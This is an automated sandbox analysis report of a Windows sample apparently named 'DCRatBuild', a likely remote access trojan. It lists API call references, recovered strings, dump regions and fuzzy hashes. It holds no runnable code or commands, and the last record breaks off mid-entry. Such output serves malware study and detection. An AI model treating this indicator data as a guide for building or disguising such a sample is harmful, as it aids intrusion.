                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D875F5
                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D87618
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                      • Instruction ID: 4075cd9c47e8252c1a622f0fe22624170a4ab56496ad7981352e1fe800178794
                      • Opcode Fuzzy Hash: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                      • Instruction Fuzzy Hash: F4F04430A0461CBBDB15AF54DC0AB9DBFB9EF04715F14416AF809E2260EB318E44CB74
                      APIs
                        • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                        • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                      • GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                      • API String ID: 2141747552-1753850145
                      • Opcode ID: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                      • Instruction ID: 156a39994be617e21082af6f2ffd6e6b7970c1446ab25fa66627276f0493932f
                      • Opcode Fuzzy Hash: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                      • Instruction Fuzzy Hash: ADE04678800751AFCF209F3D9808B42BFE4AB14710B04C81EE4DAE3280EAB5D5888F70
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                      • Instruction ID: a26ea2aa57907dac0bc7edceb1f6e1d83abe4507eda251acc7f56da3c284774e
                      • Opcode Fuzzy Hash: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                      • Instruction Fuzzy Hash: D441A332A003049FDB25EF78C881A5EB7B6EF89714F6545A9E515EB341EB31ED01CBA0
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 00D8B619
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8B63C
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8B662
                      • _free.LIBCMT ref: 00D8B675
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8B684
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                      • Instruction ID: 92e238de642403accd595decf680bec1ba5bf7d963aaf6d5e785ba89cde9803b
                      • Opcode Fuzzy Hash: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                      • Instruction Fuzzy Hash: 650175A2601715BB632126B65C49C7B6A6DDEC6BB1319022BB904D6210EF60CD0192B4
                      APIs
                      • GetLastError.KERNEL32(?,00DA0EE8,00000200,00D8895F,00D858FE,?,?,?,?,00D6D25E,?,02F435F8,00000063,00000004,00D6CFE0,?), ref: 00D8902E
                      • _free.LIBCMT ref: 00D89063
                      • _free.LIBCMT ref: 00D8908A
                      • SetLastError.KERNEL32(00000000,00D93958,00000050,00DA0EE8), ref: 00D89097
                      • SetLastError.KERNEL32(00000000,00D93958,00000050,00DA0EE8), ref: 00D890A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 24fa8e5df8fa9c4fda14b7b7d5a99066bd51af2ba54eff4f0efe24e60577a30d
                      • Instruction ID: 080bea547649883323336b90d84bfa12bb5b89632be34a115edf02345160af78
                      • Opcode Fuzzy Hash: 24fa8e5df8fa9c4fda14b7b7d5a99066bd51af2ba54eff4f0efe24e60577a30d
                      • Instruction Fuzzy Hash: 9601F476505B006A93227B396C96E3BA76EDBC137172C012AF589D2392EF61CC016370
                      APIs
                        • Part of subcall function 00D70A41: ResetEvent.KERNEL32(?), ref: 00D70A53
                        • Part of subcall function 00D70A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D70A67
                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D7078F
                      • CloseHandle.KERNEL32(?,?), ref: 00D707A9
                      • DeleteCriticalSection.KERNEL32(?), ref: 00D707C2
                      • CloseHandle.KERNEL32(?), ref: 00D707CE
                      • CloseHandle.KERNEL32(?), ref: 00D707DA
                        • Part of subcall function 00D7084E: WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                        • Part of subcall function 00D7084E: GetLastError.KERNEL32(?), ref: 00D70860
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                      • String ID:
                      • API String ID: 1868215902-0
                      • Opcode ID: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                      • Instruction ID: 6390b166a34c2e5d336d49015376f2b3d3a535cf3b4ed7f632a1de1dffd0f67a
                      • Opcode Fuzzy Hash: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                      • Instruction Fuzzy Hash: 24015E72540704EFCB229F69DD85F86BBE9FB49710F00452AF16E822A4DB756A44CBB0
                      APIs
                      • _free.LIBCMT ref: 00D8BF28
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D8BF3A
                      • _free.LIBCMT ref: 00D8BF4C
                      • _free.LIBCMT ref: 00D8BF5E
                      • _free.LIBCMT ref: 00D8BF70
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                      • Instruction ID: 44d1bf2554cfa37d23cd3a5bb42f2da04a0c792b9fb9d18c48a672a6d95f6a01
                      • Opcode Fuzzy Hash: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                      • Instruction Fuzzy Hash: 57F0AF73508205AB8620FB68EE86C1A77DAFE047607A84806F549D7A55CF35FC819BB4
                      APIs
                      • _free.LIBCMT ref: 00D8807E
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D88090
                      • _free.LIBCMT ref: 00D880A3
                      • _free.LIBCMT ref: 00D880B4
                      • _free.LIBCMT ref: 00D880C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                      • Instruction ID: 3fee461336e5da61cdc9c96908afee0cab5454a41c6dc1abc84e3ef2abf8a095
                      • Opcode Fuzzy Hash: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                      • Instruction Fuzzy Hash: A5F0177E8013378B9711BB19BC028197B66F716720348470AF410D6B72CB310861AFF5
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D67579
                        • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D67640
                        • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                        • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                        • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                      • API String ID: 3813983858-639343689
                      • Opcode ID: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                      • Instruction ID: 3339d29a7f56e7b17e4a5945cbcb5fe9a03c7f638df5cc64ebf263f604f7baeb
                      • Opcode Fuzzy Hash: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                      • Instruction Fuzzy Hash: 9D317071908249AFDF20EBA8DC41BEEBB69EF15358F048055F449E7292DB744A44CB71
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7A4B8
                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D7A4CD
                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7A4E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText$DialogWindow
                      • String ID: ASKNEXTVOL
                      • API String ID: 445417207-3402441367
                      • Opcode ID: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                      • Instruction ID: 7920f50b5f7a6272c662504805992e69cfe52b42d685ad9abc653b153e30f228
                      • Opcode Fuzzy Hash: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                      • Instruction Fuzzy Hash: B311D632244302AFD7219F6C9D0DF6A3B69EB86305F184005F34DDB1A0D7A29D11D736
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: __fprintf_l_strncpy
                      • String ID: $%s$@%s
                      • API String ID: 1857242416-834177443
                      • Opcode ID: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                      • Instruction ID: c35d67a273df8df1feb2d1f70cae6971f4c089765bed1f4c7ae738a104c6ca49
                      • Opcode Fuzzy Hash: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                      • Instruction Fuzzy Hash: 47216F72940348AFDF20DEA4EC06FEE7BA9EF09300F040512FE1496191E371DA599B75
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7A9DE
                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D7A9F6
                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D7AA24
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText$DialogWindow
                      • String ID: GETPASSWORD1
                      • API String ID: 445417207-3292211884
                      • Opcode ID: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                      • Instruction ID: 6add612976dcfd769fdf60df70d2ac37941b50305c0ded6ca73ef96bf6196d53
                      • Opcode Fuzzy Hash: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                      • Instruction Fuzzy Hash: 9A114833940219BBDB219A689D09FFE773CEB89310F044011FB89F2180E261DD51DB72
                      APIs
                      • _swprintf.LIBCMT ref: 00D6B51E
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • _wcschr.LIBVCRUNTIME ref: 00D6B53C
                      • _wcschr.LIBVCRUNTIME ref: 00D6B54C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                      • String ID: %c:\
                      • API String ID: 525462905-3142399695
                      • Opcode ID: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                      • Instruction ID: c7cd015a18e968747e2972075988943c5fdbdffa9d180b2024c94c7791f786c7
                      • Opcode Fuzzy Hash: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                      • Instruction Fuzzy Hash: 7201D263914311ABCB20ABA59C82CABB7ACEE957B07544417F986C6081FB20D984C3B1
                      APIs
                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706F3
                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706FD
                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D7070D
                      Strings
                      • Thread pool initialization failed., xrefs: 00D70725
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                      • String ID: Thread pool initialization failed.
                      • API String ID: 3340455307-2182114853
                      • Opcode ID: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                      • Instruction ID: b592857f458d8311fe9a424cd51cfc25125e59518591e8e0d7279fedf831e0aa
                      • Opcode Fuzzy Hash: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                      • Instruction Fuzzy Hash: AC1170B1604708AFC3315F65D884AABFBECEB95755F10882EF1DEC2241E6716980CB70
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: RENAMEDLG$REPLACEFILEDLG
                      • API String ID: 0-56093855
                      • Opcode ID: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                      • Instruction ID: ab54eadc65e485df42ce906eda5c056096ffb4698984d2f2becacec77a154800
                      • Opcode Fuzzy Hash: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                      • Instruction Fuzzy Hash: 5B017171A00346AFDB118F14ED44E663FBBEB09394B048426F809D2371EAB29C50FBB1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: __alldvrm$_strrchr
                      • String ID:
                      • API String ID: 1036877536-0
                      • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                      • Instruction ID: 7e0c2428ef87c740546b6bf498bad81070821bb2342262e1b88cee4cb146b3d5
                      • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                      • Instruction Fuzzy Hash: 59A14671A00386AFDB21EE68C8A17BEFBE5EF55310F1C41ADE4D59B281D2389942C774
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D680B7,?,?,?), ref: 00D6A351
                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D680B7,?,?), ref: 00D6A395
                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?), ref: 00D6A416
                      • CloseHandle.KERNEL32(?,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00D6A41D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$Create$CloseHandleTime
                      • String ID:
                      • API String ID: 2287278272-0
                      • Opcode ID: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                      • Instruction ID: 58d4c1bc05119cc39de60f45db3b7445b63ddf86754a29bfd007727e708debab
                      • Opcode Fuzzy Hash: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                      • Instruction Fuzzy Hash: F341CE30288385ABD721DF68CC55BAABBE4AB85700F08091DF5D4E3291D6649A489B73
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D889AD,?,00000000,?,00000001,?,?,00000001,00D889AD,?), ref: 00D8C0E6
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8C16F
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D867E2,?), ref: 00D8C181
                      • __freea.LIBCMT ref: 00D8C18A
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
